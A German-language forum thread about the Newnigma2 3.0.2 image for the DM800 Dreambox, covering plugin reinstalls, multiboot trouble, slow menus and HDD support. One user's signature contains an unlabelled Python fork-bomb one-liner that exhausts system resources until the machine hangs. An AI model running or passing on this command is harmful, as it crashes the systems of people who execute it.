DM800: Newnigma2 v3.0.2

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • Original von zapper01
      Hi, in der Database ist lediglich das 3.0.1 Image - Neu flashen, dann update auf 3.0.2 und die Picons neu installieren? Hatte mit 3.0.1 keine Probleme..... Ich warte jetzt noch ein bißchen, ob noch jemand ne andere Idee hat - sonst flashe ich gleich die Box neu....
      Gruß
      Zapper

      Das 3.0.2 hängt hier im ersten Beitrag an.
      Du hast wahrscheinlich lediglich unsere Slepptimer Erweiterung deinstalliert. Deshalb der Blue Screen.

      Quellcode

      1. opkg update && opkg install enigma2-plugin-newnigma2-sleeptimer

      sollte dein Problem beheben
    • Ein Bug wäre es dann wenn wir das nachvollziehen könnten nur meine favoriten lassen sich anstandslos bedienen und ja ich hab auch das release drauf zwar nur auf der 800er aber immerhin. :D
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • So mein Problem mit nicht gefundener hdd hat sich erledigt -
      ich habe alles neu aufgesetzt.
      Nun gehts.

      Jedoch fällt mir auf, dass die 800er dadurch (im flash) noch viel lahmer wirkt,
      als vorher mit Multiboot. Meine rein perönliche Wahrnehmung, vielleicht nur meine? ggf. könnten dies manche bestätigen.

      Ich tendiere langsam zu einer anderen box _ DM500HD oder VU+Duo.
    • Original von 78mueller
      So mein Problem mit nicht gefundener hdd hat sich erledigt........vorher mit Multiboot


      immer wieder multiboot probleme.
      manche lernen es nie, obwohl es sogar im releaseposting steht...

      Original von nightmann
      [*] multiboot:
      Kein Support für Multiboot. Nicht geplant, nicht erwünscht!
    • weil das image numal in den flash gehört.

      und ich finde es auch gut so hatte vorher auch multiboot und nur probs nu nix mehr .und sind wir doch mal ehrlich ,zum schluss läuft eh nur ein image und der rest fleigt eh wieder.oder tumpelt nur so vor sich rum.

      mfg
      :freu: Der neid der anderen kotzt mich an :freu:
    • Original von Raitsa
      To use 2sub:

      send 2sub_3.01.00-r0_mipsel.ipk to /tmp and manually install it.

      The installer does not end, it will loop in "configuring" but restart Enigma2/Dreambox and 2sub will work 100% after restarting.


      Tried to install via Online Installer. Same thing happened and had to restart. Sub titles are working but not on HD channels. I have not the Language menu under the Meny button like before.
      Any help here?
    • Original von arianebox
      Original von 78mueller
      So mein Problem mit nicht gefundener hdd hat sich erledigt........vorher mit Multiboot


      immer wieder multiboot probleme.
      manche lernen es nie, obwohl es sogar im releaseposting steht...

      Original von nightmann
      [*] multiboot:
      Kein Support für Multiboot. Nicht geplant, nicht erwünscht!


      Ja, nun mal halblang, viele lassen es im multiboot laufen,
      da war ich ja nicht der einzige.
      In der Regel funktioniert es ja.

      Trotzdem ist meine 800er eine lahme Kiste!
      Das zapping geht jetzt schneller,
      das habt ihr klasse hinbekommen. Respekt.
      Aber Menü usw. dauert einfach zu lange -
      das liegt an der hardware der 800er.
      Da ist DMM schuld.

      Oder was könnte man machen, damit es "schneller" läuft?
      alle plugins löschen? habe picons auf usb-stick, das entlastet wohl.

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von 78mueller ()

    • Original von arianebox
      SD skins sind z.b. schneller als HD skins
      das liegt wie du schon gesagt hast an der hardware


      OK, dann hätten wir ja schon einen Verursacher
      der Verlangsamung. Möchte HD-skins aber nicht mehr missen,
      vor allem die schön transparenten.

      Naja, wegen Schönheit muss man leiden.....
    • Original von signal


      Tried to install via Online Installer. Same thing happened and had to restart. Sub titles are working but not on HD channels. I have not the Language menu under the Meny button like before.
      Any help here?


      Press Yellow button.
      The again press Yellow button and pick up your prefered language
      The Real PiratDK
    • Original von Obi-Stan
      Konnte im Changelog nichts passendes finden, aber hat sich was im OE 1.6 bzgl. der HDD Kompatibilität getan? Leider wollten die letzten 3er bei mir net laufen und deshalb rennt seitdem 2.8.4. Wäre aber schon cool wieder aufs neue Release wechseln zu können.

      Cya
      Obi-Stan

      Zitiere mich echt ungern, scheint aber in der anfänglichen Freude untergegangen zu sein :) Wurde da in die Richtung nun was gearbeitet?
      Danke schonmal!

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Obi-Stan ()

    • Original von Obi-Stan
      Original von Obi-Stan
      Konnte im Changelog nichts passendes finden, aber hat sich was im OE 1.6 bzgl. der HDD Kompatibilität getan? Leider wollten die letzten 3er bei mir net laufen und deshalb rennt seitdem 2.8.4. Wäre aber schon cool wieder aufs neue Release wechseln zu können.

      Cya
      Obi-Stan

      Zitiere mich echt ungern, scheint aber in der anfänglichen Freude untergegangen zu sein :) Wurde da in die Richtung nun was gearbeitet?
      Danke schonmal!


      noe wie denn keine kernelfixe aber mir wurde nun mehrfach gesagt, dass es klappt mit der platte ka wieso .. wir wuerden darauf hinweisen, wenn es verbesserungen gibt, aber wie gesagt einige haben nun weniger probleme ka wieso ..